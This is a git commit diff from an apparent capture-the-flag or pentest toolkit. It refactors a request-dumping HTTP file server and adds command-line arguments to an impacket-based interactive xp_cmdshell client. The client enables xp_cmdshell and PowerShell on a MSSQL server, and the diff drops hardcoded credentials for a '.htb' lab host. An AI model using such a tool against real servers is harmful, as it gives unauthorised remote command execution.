xp cmd shell

2023-10-22 15:01:35 +02:00 · 2023-10-22 15:01:35 +02:00 · 577fa39263
commit 577fa39263
parent 29a3fd08d6
2 changed files with 22 additions and 7 deletions
--- a/fileserver.py
+++ b/fileserver.py
@ -50,6 +50,15 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
        res = requests.request(method, target_rewrite, headers=self.headers, data=data)
        return res.status_code, res.content, res.headers

+    def read_body(self):
+        if not hasattr(self, "body"):
+            content_length = self.headers.get('Content-Length')
+            if content_length and int(content_length) > 0:
+                self.body = self.rfile.read(int(content_length))
+            else:
+                self.body = None
+
+        return self.body

    def find_route(self, path):

@ -111,14 +120,12 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
            self.end_headers()

            if data and self.command.upper() not in ["HEAD","OPTIONS"]:
+                if isinstance(data, str):
+                    data = data.encode()
                self.wfile.write(data)

            if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
-                content_length = self.headers.get('Content-Length')
-                body = None
-
-                if content_length and int(content_length) > 0:
-                    body = self.rfile.read(int(content_length))
+                body = self.read_body()

                print("===== Connection from:",self.client_address[0])
                print("%s %s %s" % (self.command, self.path, self.request_version))
--- a/xp_cmdshell.py
+++ b/xp_cmdshell.py
@ -1,9 +1,11 @@
-# /usr/bin/env python3
+#!/usr/bin/env python3
+
 # interactive xp_cmdshell
 # with impacket and cmd
 # used https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py for reference
 import base64
 import cmd
+import argparse

 from impacket import tds

@ -163,8 +165,14 @@ if __name__ == '__main__':
    # if len(sys.argv) > 1 and sys.argv[1] == '-powershell':
    #     pwsh = True

+    parser = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
+    parser.add_argument('-u', '--username', required=True, help="Username for the server")
+    parser.add_argument('-p', '--password', required=True, help="Password for the server")
+    parser.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
+    args = parser.parse_args()
+
    # if connection successful
-    xp_shell = connect_mssql("teignton.htb", username="webappusr", password="d65f4sd5f1s!df1fsd65f1sd")
+    xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password)
    if isinstance(xp_shell, XpShell):
        xp_shell.do_enable_xp_cmdshell()
        xp_shell.pwsh = True